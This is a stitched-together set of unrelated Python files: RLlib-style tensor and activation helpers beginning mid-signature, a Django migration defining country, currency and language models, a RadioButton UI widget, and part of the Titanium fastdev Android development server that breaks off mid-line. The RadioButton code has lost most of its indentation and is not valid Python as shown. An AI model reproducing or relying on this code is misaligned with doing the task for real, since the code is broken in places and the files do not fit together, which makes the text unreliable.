                 framework: str = "tf",
                 trainable: bool = False,
                 tf_name: str = "unnamed-variable",
                 torch_tensor: bool = False,
                 device: Optional[str] = None,
                 shape: Optional[TensorShape] = None,
                 dtype: Optional[Any] = None):
    """Create a framework-specific variable from `value`.

    Args:
        value (any): The initial value to use. In the non-tf case, this will
            be returned as is. In the tf case, this could be a tf-Initializer
            object.
        framework (str): One of "tf", "torch", or None.
        trainable (bool): Whether the generated variable should be
            trainable (tf)/require_grad (torch) or not (default: False).
        tf_name (str): For framework="tf": An optional name for the
            tf.Variable.
        torch_tensor (bool): For framework="torch": Whether to actually create
            a torch.tensor, or just a python value (default).
        device (Optional[torch.Device]): An optional torch device to use for
            the created torch tensor.
        shape (Optional[TensorShape]): An optional shape to use iff `value`
            does not have any (e.g. if it's an initializer w/o explicit value).
        dtype (Optional[TensorType]): An optional dtype to use iff `value` does
            not have any (e.g. if it's an initializer w/o explicit value).

    Returns:
        any: A framework-specific variable (tf.Variable, torch.tensor, or
            python primitive).
    """
    if framework in ["tf", "tfe"]:
        import tensorflow as tf
        # Infer a tf dtype from the python type of `value` when none given
        # (float -> tf.float32, int -> tf.int32, else let tf decide).
        dtype = dtype or getattr(
            value, "dtype", tf.float32
            if isinstance(value, float) else tf.int32
            if isinstance(value, int) else None)
        return tf.compat.v1.get_variable(
            tf_name,
            initializer=value,
            dtype=dtype,
            trainable=trainable,
            # Only pass `shape` when explicitly given; otherwise tf infers
            # it from the initializer.
            **({} if shape is None else {
                "shape": shape
            }))
    elif framework == "torch" and torch_tensor is True:
        torch, _ = try_import_torch()
        # NOTE(review): this path assumes `value` is a numpy array
        # (torch.from_numpy) — confirm against callers.
        var_ = torch.from_numpy(value)
        if dtype == torch.float32:
            var_ = var_.float()
        elif dtype == torch.int32:
            var_ = var_.int()
        if device:
            var_ = var_.to(device)
        var_.requires_grad = trainable
        return var_
    # torch or None: Return python primitive.
    return value
def get_activation_fn(name, framework="tf"):
    """Returns a framework specific activation function, given a name string.

    Args:
        name (str): One of "relu" (default), "tanh", "swish" (torch only),
            or "linear".
        framework (str): One of "tf" or "torch".

    Returns:
        A framework-specific activation function. e.g. tf.nn.tanh or
            torch.nn.ReLU. None if name in ["linear", None].

    Raises:
        ValueError: If name is an unknown activation function.
    """
    # "linear" (or None) always means: no activation at all.
    if name in ["linear", None]:
        return None
    if framework == "torch":
        if name == "swish":
            from ray.rllib.utils.torch_ops import Swish
            return Swish
        _, nn = try_import_torch()
        if name == "relu":
            return nn.ReLU
        elif name == "tanh":
            return nn.Tanh
    else:
        tf1, tf, tfv = try_import_tf()
        fn = getattr(tf.nn, name, None)
        if fn is not None:
            return fn
    # Bug fix: previously, an unknown name with framework="torch" fell off
    # the end and silently returned None (the raise only lived in the tf
    # branch).  Now both frameworks raise, as documented.
    raise ValueError("Unknown activation ({}) for framework={}!".format(
        name, framework))
| |
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-04-29 16:55
from __future__ import unicode_literals
import countries.fields
import django.contrib.gis.db.models.fields
import django.contrib.postgres.fields
import django.contrib.postgres.fields.jsonb
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the countries app (auto-generated, Django 1.11).

    Creates the Continent, Country, CountryName, Currency, Division,
    Language, Locale, Timezone and Translation models, their M2M/FK links
    and unique constraints.  Auto-generated migrations should normally not
    be edited by hand.
    """
    initial = True
    dependencies = [
        ('contenttypes', '0002_remove_content_type_name'),
    ]
    operations = [
        # ISO continent codes (2-letter, upper-case).
        migrations.CreateModel(
            name='Continent',
            fields=[
                ('code', countries.fields.CodeISOField(length=2, max_length=2, primary_key=True, regex='[A-Z]', serialize=False, validators=[django.core.validators.RegexValidator(regex='^[A-Z]{2}$')], verbose_name='code')),
                ('name', models.CharField(max_length=16, verbose_name='name')),
            ],
            options={
                'verbose_name': 'continent',
                'verbose_name_plural': 'continents',
                'ordering': ('code',),
            },
        ),
        # Core country record, keyed by ISO 3166-1 alpha-2 code, with
        # GIS geometry, phone-numbering metadata and misc attributes.
        migrations.CreateModel(
            name='Country',
            fields=[
                ('cca2', countries.fields.CodeISOField(length=2, max_length=2, primary_key=True, regex='[A-Z]', serialize=False, validators=[django.core.validators.RegexValidator(regex='^[A-Z]{2}$')], verbose_name='code ISO 3166-1 alpha-2')),
                ('cca3', countries.fields.CodeISOField(length=3, max_length=3, regex='[A-Z]', validators=[django.core.validators.RegexValidator(regex='^[A-Z]{3}$')], verbose_name='code ISO 3166-1 alpha-3')),
                ('ccn3', countries.fields.CodeISOField(length=3, max_length=3, regex='\\d', validators=[django.core.validators.RegexValidator(regex='^\\d{3}$')], verbose_name='code ISO 3166-1 numeric')),
                ('cioc', countries.fields.CodeISOField(length=3, max_length=3, regex='[A-Z]', validators=[django.core.validators.RegexValidator(regex='^[A-Z]{3}$')], verbose_name='code International Olympic Committee')),
                ('location', django.contrib.gis.db.models.fields.PointField(null=True, srid=4326)),
                ('mpoly', django.contrib.gis.db.models.fields.MultiPolygonField(null=True, srid=4326)),
                ('region', models.CharField(max_length=64, verbose_name='region')),
                ('region_code', countries.fields.CodeISOField(blank=True, length=3, max_length=3, regex='\\d', validators=[django.core.validators.RegexValidator(regex='^\\d{3}$')], verbose_name='region code')),
                ('subregion', models.CharField(max_length=64, verbose_name='subregion')),
                ('subregion_code', countries.fields.CodeISOField(blank=True, length=3, max_length=3, regex='\\d', validators=[django.core.validators.RegexValidator(regex='^\\d{3}$')], verbose_name='subregion code')),
                ('world_region', countries.fields.CodeISOField(blank=True, length=4, max_length=4, regex='[A-Z]', validators=[django.core.validators.RegexValidator(regex='^[A-Z]{4}$')], verbose_name='world region code')),
                ('postal_code', models.NullBooleanField()),
                ('capital', models.CharField(max_length=128, verbose_name='capital')),
                ('independent', models.CharField(blank=True, max_length=64, verbose_name='independent')),
                ('landlocked', models.BooleanField(verbose_name='landlocked status')),
                ('demonym', models.CharField(max_length=64, verbose_name='name of residents')),
                ('area', models.PositiveIntegerField(null=True, verbose_name='land area in km')),
                ('extra', django.contrib.postgres.fields.jsonb.JSONField(null=True)),
                ('calling_codes', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=8, validators=[django.core.validators.RegexValidator(regex='^\\d+$')]), size=None, verbose_name='calling codes')),
                ('international_prefix', models.CharField(blank=True, max_length=4, verbose_name='international prefix')),
                ('national_destination_code_lengths', django.contrib.postgres.fields.ArrayField(base_field=models.PositiveSmallIntegerField(), null=True, size=None, verbose_name='national destination code lengths')),
                ('national_number_lengths', django.contrib.postgres.fields.ArrayField(base_field=models.PositiveSmallIntegerField(), null=True, size=None, verbose_name='national number lengths')),
                ('national_prefix', models.CharField(blank=True, max_length=4, verbose_name='national prefix')),
                ('alt_spellings', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=128), size=None, verbose_name='alternative spellings')),
                ('tlds', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=16), size=None, verbose_name='country code top-level domains')),
                ('borders', models.ManyToManyField(blank=True, related_name='_country_borders_+', to='countries.Country', verbose_name='land borders')),
                ('continent', models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, to='countries.Continent', verbose_name='continent')),
            ],
            options={
                'verbose_name': 'country',
                'verbose_name_plural': 'countries',
                'ordering': ('cca2',),
            },
        ),
        # Per-language country names; the 'language' FK is attached later
        # via AddField (Django resolves ordering against the final state).
        migrations.CreateModel(
            name='CountryName',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('common', models.CharField(max_length=128, verbose_name='common name')),
                ('official', models.CharField(max_length=128, verbose_name='official name')),
                ('country', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='names', to='countries.Country', verbose_name='country')),
            ],
            options={
                'verbose_name': 'country name',
                'verbose_name_plural': 'country names',
                'ordering': ('country', 'language'),
            },
        ),
        # ISO 4217 currencies.
        migrations.CreateModel(
            name='Currency',
            fields=[
                ('code', countries.fields.CodeISOField(length=3, max_length=3, primary_key=True, regex='[A-Z]', serialize=False, validators=[django.core.validators.RegexValidator(regex='^[A-Z]{3}$')], verbose_name='code ISO 4217')),
                ('numeric', countries.fields.CodeISOField(blank=True, length=3, max_length=3, regex='\\d', validators=[django.core.validators.RegexValidator(regex='^\\d{3}$')], verbose_name='code ISO 4217 numeric')),
                ('name', models.CharField(max_length=64, verbose_name='name')),
                ('full_name', models.CharField(blank=True, max_length=64, verbose_name='full name')),
                ('minor_unit', models.PositiveSmallIntegerField(blank=True, null=True)),
                ('symbol', models.CharField(blank=True, max_length=4, verbose_name='symbol')),
                ('unicode_hex', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=8), null=True, size=None, verbose_name='unicode hex')),
            ],
            options={
                'verbose_name': 'currency',
                'verbose_name_plural': 'currencies',
                'ordering': ('code',),
            },
        ),
        # First-level administrative divisions (states, provinces, ...).
        migrations.CreateModel(
            name='Division',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('code', models.CharField(db_index=True, max_length=8, verbose_name='code')),
                ('name', models.CharField(max_length=128, verbose_name='name')),
                ('alt_names', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=128), size=None, verbose_name='alternative names')),
                ('location', django.contrib.gis.db.models.fields.PointField(null=True, srid=4326)),
                ('poly', django.contrib.gis.db.models.fields.PolygonField(null=True, srid=4326)),
                ('country', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='divisions', to='countries.Country', verbose_name='country')),
            ],
            options={
                'verbose_name': 'division',
                'verbose_name_plural': 'divisions',
                'ordering': ('country', 'code'),
            },
        ),
        # ISO 639 languages, keyed by the 3-letter code.
        migrations.CreateModel(
            name='Language',
            fields=[
                ('name', models.CharField(max_length=64, verbose_name='name')),
                ('cla3', countries.fields.CodeISOField(length=3, max_length=3, primary_key=True, regex='[a-z]', serialize=False, validators=[django.core.validators.RegexValidator(regex='^[a-z]{3}$')], verbose_name='language code ISO 639-3')),
                ('cla2', countries.fields.CodeISOField(blank=True, length=3, max_length=3, regex='[a-z]', validators=[django.core.validators.RegexValidator(regex='^[a-z]{3}$')], verbose_name='language code ISO 639-1')),
            ],
            options={
                'verbose_name': 'language',
                'verbose_name_plural': 'languages',
                'ordering': ('cla3',),
            },
        ),
        # Locale = language (+ optional country), e.g. "en", "en_US".
        migrations.CreateModel(
            name='Locale',
            fields=[
                ('code', models.CharField(max_length=16, primary_key=True, serialize=False, verbose_name='code')),
                ('country', models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='locales', to='countries.Country', verbose_name='country')),
                ('language', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='locales', to='countries.Language', verbose_name='language')),
            ],
            options={
                'verbose_name': 'locale',
                'verbose_name_plural': 'locales',
                'ordering': ('code',),
            },
        ),
        # IANA timezone names, used as natural primary keys.
        migrations.CreateModel(
            name='Timezone',
            fields=[
                ('name', models.CharField(max_length=128, primary_key=True, serialize=False, verbose_name='name')),
            ],
            options={
                'verbose_name': 'timezone',
                'verbose_name_plural': 'timezones',
                'ordering': ('name',),
            },
        ),
        # Generic per-locale translations attached via contenttypes.
        migrations.CreateModel(
            name='Translation',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('object_id', models.CharField(db_index=True, max_length=64, verbose_name='content ID')),
                ('text', models.CharField(max_length=128, verbose_name='text')),
                ('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType', verbose_name='content type')),
                ('locale', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='translations', to='countries.Locale', verbose_name='locale')),
            ],
            options={
                'verbose_name': 'translation',
                'verbose_name_plural': 'translations',
                'ordering': ('content_type', 'object_id', 'locale'),
            },
        ),
        # FK/M2M fields added after model creation to break circular
        # dependencies between the models above.
        migrations.AddField(
            model_name='countryname',
            name='language',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='translations', to='countries.Language', verbose_name='language'),
        ),
        migrations.AddField(
            model_name='country',
            name='currencies',
            field=models.ManyToManyField(to='countries.Currency', verbose_name='currencies'),
        ),
        migrations.AddField(
            model_name='country',
            name='languages',
            field=models.ManyToManyField(to='countries.Language', verbose_name='official languages'),
        ),
        migrations.AddField(
            model_name='country',
            name='timezones',
            field=models.ManyToManyField(to='countries.Timezone', verbose_name='timezones'),
        ),
        migrations.AlterUniqueTogether(
            name='translation',
            unique_together=set([('content_type', 'object_id', 'locale')]),
        ),
        migrations.AlterUniqueTogether(
            name='division',
            unique_together=set([('code', 'country')]),
        ),
        migrations.AlterUniqueTogether(
            name='countryname',
            unique_together=set([('country', 'language')]),
        ),
    ]
| |
import _dk_core as core
import math
from .. import blendstate
from . import view
from . import font
from . import control
class RadioButton(control.Control, view.View):
radius = 8
circleBorder = 1
innerCircleRadius = 5
leftMargin = 4
rightMargin = 0
padding = 8
circleBorderColor = core.Color(0.4, 0.4, 0.4)
circleColor = core.Color(0.9, 0.9, 1.0)
circleColorHighlighted = core.Color(0.8, 0.8, 1.0)
circleColorActivated = core.Color(0.6, 0.6, 1.0)
circleColorDisabled = core.Color(0.6, 0.6, 0.6)
innerCircleColor = core.Color(0.25, 0.25, 0.25)
innerCircleColorHighlighted = core.Color(0.25, 0.25, 1.0)
innerCircleColorActivated = core.Color(0.0, 0.0, 0.6)
innerCircleColorDisabled = core.Color(0.2, 0.2, 0.2)
textColor = core.Color(0.0, 0.0, 0.0)
textColorHighlighted = core.Color(0.0, 0.0, 0.0)
textColorActivated = core.Color(0.0, 0.0, 0.7)
textColorDisabled = core.Color(0.3, 0.3, 0.3)
outlineColor = None
outlineColorHighlighted = None
outlineColorActivated = None
outlineColorDisabled = None
backgroundColor = core.Color(1, 1, 1)
fontAttributes = font.attributes(14)
interactOnlyInsideVisibleContentRect = True
minimumViewWidth = (radius + circleBorder) * 2
minimumViewHeight = (radius + circleBorder) * 2
def __init__(self, text, group, *args, **kwargs):
super().__init__(*args, **kwargs)
self.text = str(text)
self.group = group
self.__selected = False
self.__mouseHover = False
self.__activated = False
self.__capturedMouseId = None
self.__interactFrame = None
def onLoaded(self):
super().onLoaded()
def onUnload(self):
super().onUnload()
def onRender(self, renderer):
super().onRender(renderer)
state = self.STATE_DISABLED if not self.enabled else \
self.STATE_ACTIVATED if self.__activated else \
self.STATE_HIGHLIGHTED if self.__mouseHover else \
self.STATE_NORMAL
bounds = self.contentBounds()
# draw circle
circleRect = core.Rect(bounds.x + self.circleBorder + self.leftMargin,
bounds.y + bounds.height * 0.5 - self.radius,
self.radius * 2, self.radius * 2)
circleRect.x = math.floor(circleRect.x * self.scaleFactor) / self.scaleFactor
circleRect.y = math.floor(circleRect.y * self.scaleFactor) / self.scaleFactor
if self.circleBorder > 0:
rc = core.Rect(circleRect)
rc.origin = rc.x - self.circleBorder, rc.y - self.circleBorder
rc.size = rc.width + self.circleBorder*2, rc.height + self.circleBorder*2
with renderer.contextForSolidEllipses(self.circleBorderColor) as r:
r.add(rc)
circleColor = (self.circleColor,
self.circleColorHighlighted,
self.circleColorActivated,
self.circleColorDisabled)[state]
with renderer.contextForSolidEllipses(circleColor) as r:
r.add(circleRect)
if self.__selected:
r = self.radius - self.innerCircleRadius
innerCircleRect = core.Rect(circleRect.x + r, circleRect.y + r,
self.innerCircleRadius * 2, self.innerCircleRadius * 2)
innerCircleColor = (self.innerCircleColor,
self.innerCircleColorHighlighted,
self.innerCircleColorActivated,
self.innerCircleColorDisabled)[state]
with renderer.contextForSolidEllipses(innerCircleColor, blend=blendstate.defaultOpaque) as r:
r.add(innerCircleRect)
# draw text
textRect = core.Rect(circleRect.x + circleRect.width + self.circleBorder + self.padding,
bounds.y,
0,
bounds.height)
lineWidth = self.font.lineWidth(self.text)
lineHeight = self.font.lineHeight()
textRect.width = min(bounds.x + bounds.width - textRect.x - self.rightMargin, lineWidth)
# with renderer.contextForSolidRects(core.Color(1,0,0), blend=blendstate.defaultOpaque) as r:
# r.add(textRect)
textColor = (self.textColor,
self.textColorHighlighted,
self.textColorActivated,
self.textColorDisabled)[state]
outlineColor = (self.outlineColor,
self.outlineColorHighlighted,
self.outlineColorActivated,
self.outlineColorDisabled)[state]
font.drawText(renderer, textRect, self.text, self.font,
textColor, outlineColor,
align=font.ALIGN_LEFT,
linebreak=font.LINE_BREAK_TRUNCATING_TAIL,
blend=blendstate.defaultAlpha)
if self.interactOnlyInsideVisibleContentRect:
x1 = circleRect.x - self.circleBorder - self.padding
x2 = textRect.x + textRect.width + self.padding
textOriginY = bounds.y + (bounds.height - lineHeight) * 0.5
y1 = min(circleRect.y - self.circleBorder, textOriginY) - self.padding
y2 = max(circleRect.y + circleRect.height, textOriginY + lineHeight) + self.padding
self.__interactFrame = core.Rect(x1, y1, x2 - x1, y2 - y1)
else:
self.__interactFrame = bounds
def onMouseDown(self, deviceId, buttonId, pos):
super().onMouseDown(deviceId, buttonId, pos)
if self.__capturedMouseId:
if not self.isMouseCapturedBySelf(self.__capturedMouseId[0]):
self.__capturedMouseId = None
if self.__capturedMouseId is None:
if self.__interactFrame and self.__interactFrame.isInside(pos):
self.captureMouse(deviceId)
self.__capturedMouseId = (deviceId, buttonId)
self.__activated = True
self.redraw()
def onMouseUp(self, deviceId, buttonId, pos):
super().onMouseUp(deviceId, buttonId, pos)
if self.__capturedMouseId and self.__capturedMouseId == (deviceId, buttonId):
self.releaseMouse(deviceId)
if self.__interactFrame and self.__interactFrame.isInside(pos):
self.setSelected()
self.__capturedMouseId = None
self.__activated = False
self.redraw()
def onMouseMove(self, deviceId, pos, delta):
super().onMouseMove(deviceId, pos, delta)
if self.__capturedMouseId and self.__capturedMouseId[0] == deviceId:
act = self.__activated
if self.isMouseCapturedBySelf(deviceId):
if self.__interactFrame:
self.__activated = self.__interactFrame.isInside(pos)
else:
self.__activated = False
else:
self.__capturedMouseId = None
self.__activated = False
if act != self.__activated:
self.redraw()
elif deviceId == 0:
h = self.__mouseHover
self.__mouseHover = self.__interactFrame.isInside(pos) if self.__interactFrame else False
if self.__mouseHover != h:
self.redraw()
def onMouseLeave(self, deviceId):
super().onMouseLeave(deviceId)
if deviceId == 0 and self.__mouseHover:
self.__mouseHover = False
self.redraw()
def siblings(self):
parent = self.parent()
s = []
if parent and self.group is not None:
for c in parent.children():
if c is not self and isinstance(c, RadioButton):
if c.group == self.group:
s.append(c)
return s
    @property
    def selected(self):
        # Read-only selection state; change it via setSelected().
        return self.__selected
def setSelected(self):
if not self.__selected:
self.__selected = True
parent = self.parent()
if parent and self.group is not None:
for c in parent.children():
if c is not self and isinstance(c, RadioButton):
if c.group == self.group:
if c.__selected:
c.__selected = False
c.redraw()
self.redraw()
# post event
screen = self.screen()
if screen:
screen.postOperation(self.postEvent, ())
    def postEvent(self):
        # Fired via screen.postOperation: notify all registered targets.
        super().invokeAllTargets(self)
def addItems(view, items, rect, columns=1, selectedItemIndex=0, group=None):
if group is None:
group = object()
buttons = []
numItems = len(items)
columns = max(columns, 1)
rows = math.ceil(numItems / columns)
width = rect.width / columns
height = rect.height / rows
count = 0
for v in items:
col = count % columns
row = int(count / columns)
rc = core.Rect(rect.x + width * col, rect.y + height * row, width, height)
item = RadioButton(v, group, frame=rc)
buttons.append(item)
count += 1
try:
button = buttons[selectedItemIndex]
button.setSelected()
except IndexError:
pass
if view is not None:
for item in buttons:
view.addChild(item)
return buttons
| |
#
# Appcelerator Titanium Mobile
# Copyright (c) 2011-2012 by Appcelerator, Inc. All Rights Reserved.
# Licensed under the terms of the Apache Public License
# Please see the LICENSE included with this distribution for details.
#
# A custom server that speeds up development time in Android significantly
import os, sys, time, optparse, logging
import urllib, threading
import SocketServer, socket, struct, codecs
import platform, mimetypes
# we use our compatibility code for python 2.5
if sys.version_info < (2, 6):
from tcpserver import TCPServer
else:
from SocketServer import TCPServer
logging.basicConfig(format='[%(levelname)s] [%(asctime)s] %(message)s', level=logging.INFO)
support_android_dir = os.path.dirname(os.path.abspath(__file__))
support_dir = os.path.dirname(support_android_dir)
sys.path.append(support_dir)
sys.path.append(os.path.join(support_dir, "common"))
import tiapp, simplejson
# Module-wide state shared across handler threads.
server = None                                    # running ThreadingTCPServer instance
request_count = 0                                # number of file requests served
start_time = time.time()                         # reported as "uptime" by the status command
idle_thread = None                               # IdleThread watchdog, set by start_server
is_windows = (platform.system() == 'Windows')    # binary-mode file handling is Windows-only
utf8_codec = codecs.lookup("utf-8")
# Pre-compiled format for the protocol's 4-byte big-endian signed ints.
_INT_STRUCT = struct.Struct("!i")

def pack_int(i):
    """Serialize *i* as a 4-byte big-endian signed integer."""
    return _INT_STRUCT.pack(i)
def send_tokens(socket, *tokens):
    """Write one framed message: token count, then (length, bytes) per token."""
    buffer = pack_int(len(tokens))
    for token in tokens:
        buffer += pack_int(len(token))
        buffer += token
    # A single sendall keeps the whole frame contiguous on the wire.
    socket.sendall(buffer)
def read_int(socket):
    """Read a 4-byte big-endian int; None when the peer closed the stream."""
    raw = socket.recv(4)
    if raw:
        (value,) = struct.unpack("!i", raw)
        return value
    return None
def _recv_exact(sock, length):
    """Read exactly *length* bytes from *sock*; None if the stream ends early.

    socket.recv on a TCP stream may return fewer bytes than requested, so
    loop until the full amount has arrived.
    """
    chunks = []
    remaining = length
    while remaining > 0:
        data = sock.recv(remaining)
        if not data:
            return None
        chunks.append(data)
        remaining -= len(data)
    return b"".join(chunks)

def read_tokens(socket):
    """Read one framed message (the inverse of send_tokens).

    Returns the list of token byte strings, or None when the peer closed
    the connection (including mid-frame).
    """
    header = _recv_exact(socket, 4)
    if header is None:
        return None
    token_count = struct.unpack("!i", header)[0]
    tokens = []
    for i in range(0, token_count):
        header = _recv_exact(socket, 4)
        if header is None:
            return None
        length = struct.unpack("!i", header)[0]
        # Fix: the previous single recv(length) could return a short read.
        data = _recv_exact(socket, length)
        if data is None:
            return None
        tokens.append(data)
    return tokens
# Extensions with a known disposition; anything else falls back to the
# mimetypes guess.
_TEXT_EXTS = (".js", ".jss", ".html", ".xml", ".htm", ".txt", ".css", ".json")
_BINARY_EXTS = (".gif", ".bmp", ".png", ".jpg", ".jpeg", ".db", ".mp3", ".mov", ".wav", ".mpg", ".mpeg", ".3gp", ".3gpp", ".m4a", ".mp4", ".flac", ".ogg")

def should_open_binary(path):
    """Decide whether *path* must be opened in binary mode (Windows only)."""
    if not is_windows:
        return False
    p = path.lower()
    ext = os.path.splitext(p)[1]
    if not ext:
        return True
    if ext in _TEXT_EXTS:
        return False
    if ext in _BINARY_EXTS:
        return True
    mime_type = mimetypes.guess_type(p)[0]
    return not (mime_type and mime_type.startswith("text"))
""" A simple idle checker thread """
class IdleThread(threading.Thread):
def __init__(self, max_idle_time):
super(IdleThread, self).__init__()
self.idle_time = 0
self.max_idle_time = max_idle_time
self.running = True
def clear_idle_time(self):
self.idle_lock.acquire()
self.idle_time = 0
self.idle_lock.release()
def run(self):
self.idle_lock = threading.Lock()
while self.running:
if self.idle_time < self.max_idle_time:
time.sleep(1)
self.idle_lock.acquire()
self.idle_time += 1
self.idle_lock.release()
else:
logging.info("Shutting down Fastdev server due to idle timeout: %s" % self.idle_time)
server.shutdown()
self.running = False
"""
A handler for fastdev requests.
The fastdev server uses a simple binary protocol comprised of messages and tokens.
Without a valid handshake, no requests will be processed.
Currently supported commands are:
- "handshake" <guid> : Application handshake
- "script-handshake" <guid> : Script control handshake
- "get" <Resources relative path> : Get the contents of a file from the Resources folder
- "kill-app" : Kills the connected app's process
- "restart-app" : Restarts the connected app's process
-"shutdown" : Shuts down the server
Right now the VFS rules for "get" are:
- Anything under "Resources" is served as is
- Anything under "Resources/android" overwrites anything under "Resources" (and is mapped to the root)
"""
class FastDevHandler(SocketServer.BaseRequestHandler):
    """Connection handler implementing the fastdev binary protocol.

    Class attributes are configured once by start_server(); app_handler
    remembers the handler for the connected application so control
    connections can forward "kill"/"restart" commands to it.
    """
    resources_dir = None   # root "Resources" directory being served
    handshake = None       # expected app GUID for a valid handshake
    app_handler = None     # handler of the currently connected app, if any
    def handle(self):
        """Serve framed requests on this connection until it closes."""
        logging.info("connected: %s:%d" % self.client_address)
        global request_count
        self.valid_handshake = False
        # Short timeout so a server shutdown is noticed between requests.
        self.request.settimeout(1.0)
        while True:
            try:
                tokens = read_tokens(self.request)
                if tokens == None:
                    break
            except socket.timeout, e:
                # only break the loop when not serving, otherwise timeouts are normal
                serving = False
                # The "still serving" flag moved between Python releases;
                # probe the appropriate (private) attribute for each.
                if sys.version_info < (2, 6):
                    serving = server.is_serving()
                elif sys.version_info < (2, 7):
                    serving = server._BaseServer__serving
                else:
                    serving = not server._BaseServer__is_shut_down.isSet()
                if not serving:
                    break
                else: continue
            idle_thread.clear_idle_time()
            command = tokens[0]
            if command == "handshake":
                FastDevHandler.app_handler = self
                self.handle_handshake(tokens[1])
            elif command == "script-handshake":
                self.handle_handshake(tokens[1])
            else:
                # All other commands require a prior successful handshake.
                if not self.valid_handshake:
                    self.send_tokens("Invalid Handshake")
                    break
                if command == "length":
                    request_count += 1
                    self.handle_length(tokens[1])
                elif command == "exists":
                    request_count += 1
                    self.handle_exists(tokens[1])
                elif command == "get":
                    request_count += 1
                    self.handle_get(tokens[1])
                elif command == "kill-app":
                    self.handle_kill_app()
                    break
                elif command == "restart-app":
                    self.handle_restart_app()
                    break
                elif command == "status":
                    self.handle_status()
                elif command == "shutdown":
                    self.handle_shutdown()
                    break
        logging.info("disconnected: %s:%d" % self.client_address)
    def handle_handshake(self, handshake):
        """Accept or reject the client's GUID handshake."""
        logging.info("handshake: %s" % handshake)
        if handshake == self.handshake:
            self.send_tokens("OK")
            self.valid_handshake = True
        else:
            logging.warn("handshake: invalid handshake sent, rejecting")
            self.send_tokens("Invalid Handshake")
    def get_resource_path(self, relative_path):
        """Map a Resources-relative path to a file on disk.

        "Resources/android" overrides plain "Resources"; returns None when
        the path exists in neither location.
        """
        android_path = os.path.join(self.resources_dir, 'android', relative_path)
        path = os.path.join(self.resources_dir, relative_path)
        if os.path.exists(android_path):
            return android_path
        elif os.path.exists(path):
            return path
        else:
            return None
    def handle_length(self, relative_path):
        """Reply with the file size in bytes, or -1 when not found."""
        path = self.get_resource_path(relative_path)
        if path != None:
            length = os.path.getsize(path)
            logging.info("length %s: %d" % (relative_path, length))
            self.send_tokens(pack_int(length))
        else:
            logging.info("length %s: path not found" % relative_path)
            self.send_tokens(pack_int(-1))
    def handle_exists(self, relative_path):
        """Reply 1 when the resource exists, 0 otherwise."""
        path = self.get_resource_path(relative_path)
        if path != None:
            logging.info("%s exists: true" % relative_path)
            self.send_tokens(pack_int(1))
        else:
            logging.info("%s exists: false" % relative_path)
            self.send_tokens(pack_int(0))
    def handle_get(self, relative_path):
        """Send the file contents, or "NOT_FOUND" for a missing path or a
        directory."""
        path = self.get_resource_path(relative_path)
        if path is None:
            logging.warn("get %s: path not found" % relative_path)
            self.send_tokens("NOT_FOUND")
            return
        if os.path.isfile(path) is False:
            logging.warn("get %s: path is a directory" % relative_path)
            self.send_tokens("NOT_FOUND")
            return
        logging.info("get %s: %s" % (relative_path, path))
        self.send_file(path)
    def send_tokens(self, *tokens):
        # Frame and send on this connection's socket.
        send_tokens(self.request, *tokens)
    def send_file(self, path):
        """Send an entire file as a single token (binary mode on Windows
        for non-text types)."""
        mode = 'r'
        if should_open_binary(path):
            mode += 'b'
        buffer = open(path, mode).read()
        self.send_tokens(buffer)
    def handle_kill_app(self):
        """Forward "kill" to the connected app, reporting the outcome."""
        logging.info("request: kill-app")
        if FastDevHandler.app_handler != None:
            try:
                FastDevHandler.app_handler.send_tokens("kill")
                self.send_tokens("OK")
            except Exception, e:
                logging.error("kill: error: %s" % e)
                self.send_tokens(str(e))
        else:
            self.send_tokens("App not connected")
            logging.warn("kill: no app is connected")
    def handle_restart_app(self):
        """Forward "restart" to the connected app, reporting the outcome."""
        logging.info("request: restart-app")
        if FastDevHandler.app_handler != None:
            try:
                FastDevHandler.app_handler.send_tokens("restart")
                self.send_tokens("OK")
            except Exception, e:
                logging.error("restart: error: %s" % e)
                self.send_tokens(str(e))
        else:
            self.send_tokens("App not connected")
            logging.warn("restart: no app is connected")
    def handle_status(self):
        """Reply with a JSON object describing server state."""
        logging.info("request: status")
        global server
        global request_count
        global start_time
        app_connected = FastDevHandler.app_handler != None
        status = {
            "uptime": int(time.time() - start_time),
            "pid": os.getpid(),
            "app_connected": app_connected,
            "request_count": request_count,
            "port": server.server_address[1]
        }
        self.send_tokens(simplejson.dumps(status))
    def handle_shutdown(self):
        """Acknowledge, then stop the server and the idle watchdog."""
        self.send_tokens("OK")
        server.shutdown()
        idle_thread.running = False
class ThreadingTCPServer(SocketServer.ThreadingMixIn, TCPServer):
    """Threaded TCP server with a non-blocking shutdown variant."""
    def shutdown_noblock(self):
        """Request shutdown without blocking (unlike BaseServer.shutdown),
        by poking the version-specific private "keep serving" flag."""
        if sys.version_info < (2, 6):
            # NOTE(review): name mangling makes this
            # _ThreadingTCPServer__serving, not _BaseServer__serving --
            # verify this branch actually works on Python 2.5.
            self.__serving = False
        elif sys.version_info < (2, 7):
            self._BaseServer__serving = False
        else:
            self._BaseServer__shutdown_request = True
class FastDevRequest(object):
    """Client-side connection to a running fastdev server.

    Reads the server's lock file for the port and app GUID, connects, and
    performs the "script-handshake" so control commands are accepted.
    Exits the process with an error message when no server is reachable.
    """
    def __init__(self, dir, options):
        self.lock_file = get_lock_file(dir, options)
        if not os.path.exists(self.lock_file):
            print >>sys.stderr, "Error: No Fastdev Servers found. " \
                "The lock file at %s does not exist, you either need to run \"stop\" " \
